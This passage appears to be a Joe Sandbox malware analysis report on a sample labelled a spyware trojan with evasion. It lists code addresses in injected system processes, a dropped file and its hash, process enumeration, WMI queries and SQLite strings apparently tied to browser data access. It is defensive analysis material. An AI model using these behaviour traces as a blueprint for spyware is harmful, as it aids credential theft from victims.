                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FA83015_3_000001C2782FA830
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F904015_3_000001C2782F9040
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FE02815_3_000001C2782FE028
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783E802815_3_000001C2783E8028
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E280415_3_000001C2782E2804
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782F685015_3_000001C2782F6850
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E984815_3_000001C2782E9848
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783150A015_3_000001C2783150A0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783EB08C15_3_000001C2783EB08C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783230C715_3_000001C2783230C7
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783080D015_3_000001C2783080D0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782E214015_3_000001C2782E2140
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831992C15_3_000001C27831992C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27832591415_3_000001C278325914
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831592015_3_000001C278315920
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27830198015_3_000001C278301980
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2782FD16415_3_000001C2782FD164
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27837B15C15_3_000001C27837B15C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27607099815_3_000001C276070998
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ACD42C15_3_00007DF426ACD42C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9286C15_3_00007DF426A9286C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB08CC15_3_00007DF426AB08CC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E5F415_3_00007DF426B7E5F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE564015_3_00007DF426AE5640
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7757815_3_00007DF426B77578
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8A59815_3_00007DF426B8A598
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7D75C15_3_00007DF426B7D75C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B1071C15_3_00007DF426B1071C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B3A3C815_3_00007DF426B3A3C8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B723D815_3_00007DF426B723D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B013BC15_3_00007DF426B013BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B0D24815_3_00007DF426B0D248
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AA21F015_3_00007DF426AA21F0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7A19C15_3_00007DF426B7A19C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE52F415_3_00007DF426AE52F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B832F815_3_00007DF426B832F8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFD2A015_3_00007DF426AFD2A0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9105815_3_00007DF426A91058
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A95F9C15_3_00007DF426A95F9C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AEFF7815_3_00007DF426AEFF78
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB10BC15_3_00007DF426AB10BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E0B015_3_00007DF426B7E0B0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCE4815_3_00007DF426AFCE48
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8DF6C15_3_00007DF426B8DF6C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB0EF415_3_00007DF426AB0EF4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7BC6815_3_00007DF426B7BC68
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B6DBC815_3_00007DF426B6DBC8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE6BE415_3_00007DF426AE6BE4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426ABCBE815_3_00007DF426ABCBE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AEECF815_3_00007DF426AEECF8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCD3815_3_00007DF426AFCD38
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AECC8415_3_00007DF426AECC84
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE3CE815_3_00007DF426AE3CE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7DC9415_3_00007DF426B7DC94
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B319B415_3_00007DF426B319B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426A9F9C015_3_00007DF426A9F9C0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AD8B2815_3_00007DF426AD8B28
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCB5C15_3_00007DF426AFCB5C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7EB0C15_3_00007DF426B7EB0C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8AAB415_3_00007DF426B8AAB4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AA7AE015_3_00007DF426AA7AE0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AF0AD415_3_00007DF426AF0AD4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B0582415_3_00007DF426B05824
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E77415_3_00007DF426B7E774
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AAE97015_3_00007DF426AAE970
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE395C15_3_00007DF426AE395C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764069D815_2_000001C2764069D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764051BC15_2_000001C2764051BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276407FE815_2_000001C276407FE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276402F0015_2_000001C276402F00
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276409E9815_2_000001C276409E98
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640442C15_2_000001C27640442C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640B43C15_2_000001C27640B43C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640E4EA15_2_000001C27640E4EA
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640150015_2_000001C276401500
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276409B4C15_2_000001C276409B4C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764147C915_2_000001C2764147C9
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641484A15_2_000001C27641484A
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641953615_2_000001C276419536
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A392C35_3_00007DF4F81A392C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A4EFC35_3_00007DF4F81A4EFC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A220435_3_00007DF4F81A2204
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FDC2D035_2_0000021AB2FDC2D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE321835_2_0000021AB2FE3218
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FD262C35_2_0000021AB2FD262C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300420C35_2_0000021AB300420C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301422135_2_0000021AB3014221
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300522435_2_0000021AB3005224
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3010A4435_2_0000021AB3010A44
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30060EC35_2_0000021AB30060EC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEEABC35_2_0000021AB2FEEABC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301011435_2_0000021AB3010114
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F15835_2_0000021AB300F158
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE723435_2_0000021AB2FE7234
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F9A435_2_0000021AB300F9A4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE5FCC35_2_0000021AB2FE5FCC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300AFF035_2_0000021AB300AFF0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FFE02835_2_0000021AB2FFE028
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301104835_2_0000021AB3011048
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FED73035_2_0000021AB2FED730
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30050A435_2_0000021AB30050A4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF089835_2_0000021AB2FF0898
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300474435_2_0000021AB3004744
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF786835_2_0000021AB2FF7868
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEC5D835_2_0000021AB2FEC5D8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE758035_2_0000021AB2FE7580
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEFD3C35_2_0000021AB2FEFD3C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300669C35_2_0000021AB300669C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF74EC35_2_0000021AB2FF74EC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF8E8835_2_0000021AB2FF8E88
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF467835_2_0000021AB2FF4678
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FECE7035_2_0000021AB2FECE70
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF7E5835_2_0000021AB2FF7E58
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301156435_2_0000021AB3011564
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3005D8435_2_0000021AB3005D84
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3009DA835_2_0000021AB3009DA8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30055BC35_2_0000021AB30055BC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3016C0835_2_0000021AB3016C08
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3000C4C35_2_0000021AB3000C4C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F4B835_2_0000021AB300F4B8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FD14D035_2_0000021AB2FD14D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEE40435_2_0000021AB2FEE404
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300D3C835_2_0000021AB300D3C8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81A22CC35_2_00007DF4F81A22CC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B8FDC35_2_00007DF4F81B8FDC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B9C1835_2_00007DF4F81B9C18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B720035_2_00007DF4F81B7200
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B848035_2_00007DF4F81B8480
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E539635_2_00007DF4F81E5396
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E6BE735_2_00007DF4F81E6BE7
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E5BB835_2_00007DF4F81E5BB8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D4FC635_2_00007DF4F81D4FC6
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E781435_2_00007DF4F81E7814
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E3FFB35_2_00007DF4F81E3FFB
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DF40935_2_00007DF4F81DF409
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DC00935_2_00007DF4F81DC009
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DA86535_2_00007DF4F81DA865
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DC88435_2_00007DF4F81DC884
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E248735_2_00007DF4F81E2487
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E54E735_2_00007DF4F81E54E7
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E74BE35_2_00007DF4F81E74BE
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E7D1835_2_00007DF4F81E7D18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E5D7235_2_00007DF4F81E5D72
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E31E435_2_00007DF4F81E31E4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E6E1B35_2_00007DF4F81E6E1B
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E121A35_2_00007DF4F81E121A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E720A35_2_00007DF4F81E720A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DE2AB35_2_00007DF4F81DE2AB
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D867A35_2_00007DF4F81D867A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D8ED935_2_00007DF4F81D8ED9
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E571635_2_00007DF4F81E5716
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D576C35_2_00007DF4F81D576C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E636535_2_00007DF4F81E6365
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F82127AC35_2_00007DF4F82127AC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F820F04835_2_00007DF4F820F048
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F8219C7435_2_00007DF4F8219C74
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F820F8E035_2_00007DF4F820F8E0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821152C35_2_00007DF4F821152C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F82101A035_2_00007DF4F82101A0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821728D35_2_00007DF4F821728D
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F8210E7435_2_00007DF4F8210E74
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821330835_2_00007DF4F8213308
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7BD4036_2_000001F269C7BD40
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C854A036_2_000001F269C854A0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7745436_2_000001F269C77454
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C93C6036_2_000001F269C93C60
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C92BC036_2_000001F269C92BC0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C893B436_2_000001F269C893B4
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9478036_2_000001F269C94780
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9C78836_2_000001F269C9C788
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C88F9836_2_000001F269C88F98
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269CA1F2836_2_000001F269CA1F28
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C78ECC36_2_000001F269C78ECC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7D6DC36_2_000001F269C7D6DC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C926D436_2_000001F269C926D4
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8AEF036_2_000001F269C8AEF0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7C6AC36_2_000001F269C7C6AC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8E5FC36_2_000001F269C8E5FC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C89E1036_2_000001F269C89E10
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9C62036_2_000001F269C9C620
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8A5D836_2_000001F269C8A5D8
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8A94036_2_000001F269C8A940
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C898F836_2_000001F269C898F8
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7C0BC36_2_000001F269C7C0BC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8287C36_2_000001F269C8287C
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8F84C36_2_000001F269C8F84C
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9237436_2_000001F269C92374
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9333036_2_000001F269C93330
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C89A7836_2_000001F269C89A78
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C88A6036_2_000001F269C88A60
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9426436_2_000001F269C94264
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\407310\Hop.com 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                      Source: C:\Windows\System32\svchost.exeCode function: String function: 000001C27832FDB0 appears 159 times
                      Source: C:\Windows\System32\svchost.exeCode function: String function: 000001C2783AD0A8 appears 39 times
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: String function: 004062CF appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
                      Source: HI6VIJERUn.exeStatic PE information: invalid certificate
                      Source: HI6VIJERUn.exe, 00000000.00000002.1451254872.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs HI6VIJERUn.exe
                      Source: HI6VIJERUn.exe, 00000000.00000003.1449815166.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs HI6VIJERUn.exe
                      Source: HI6VIJERUn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Hop.com, 0000000E.00000003.1670942879.0000024366333000.00000040.00000400.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1667549028.0000024366333000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: FaI O k.h.o.vBP.tV.R.u_t_X_Pt G-~ qoUy_Wc_k_P v
                      Source: Hop.com, 0000000E.00000003.1670942879.0000024366333000.00000040.00000400.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1667549028.0000024366333000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: u.C.Ji.rDd_qU q q.q p d.L$_vX v_k: i_fMly.JPf.3 X_tFT.O_k_a_C H f<) F.yc: E_r_P.h P R_qY K.R.y w,v S q O L F j}.ZJ.b_J zF p.L7 KLJ.R_g_a.Q@.a_N.QAD NC nB k a< s_t w c_sQ_e z.i.Q.v.2.7.n[.t_rX.9_lqY/}V W a:F_l nYo R.k x_B Q W.M.b.S_wkM.9.7.s4 K{F_j_L- f_l0 J.SL5Y$_Q.U.s.RL f w.Q.HT.W.Tta0 t TTgz G sk f.9.Fh.K cIlA_Mx.e G.P_y_r_t.c t.a.6_u.FaI O k.h.o.vBP.tV.R.u_t_X_Pt G-~ qoUy_Wc_k_P v.1_q_w_J_xmbg<_r_p.Z`n.x
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@96/257@15/13
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4B4124 GetLastError,FormatMessageW,12_2_00007FF68C4B4124
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4AC46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00007FF68C4AC46C
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4B368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00007FF68C4B368C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6762D450-1DEC.pmaJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-848131cc-aa66-92c02f-cf44db55973b}
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Users\user\AppData\Local\Temp\nsh6CC5.tmpJump to behavior
                      Source: HI6VIJERUn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\svchost.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: chrome.exe, 00000013.00000002.1871413271.0000023A3EA60000.00000002.00000001.00040000.00000014.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
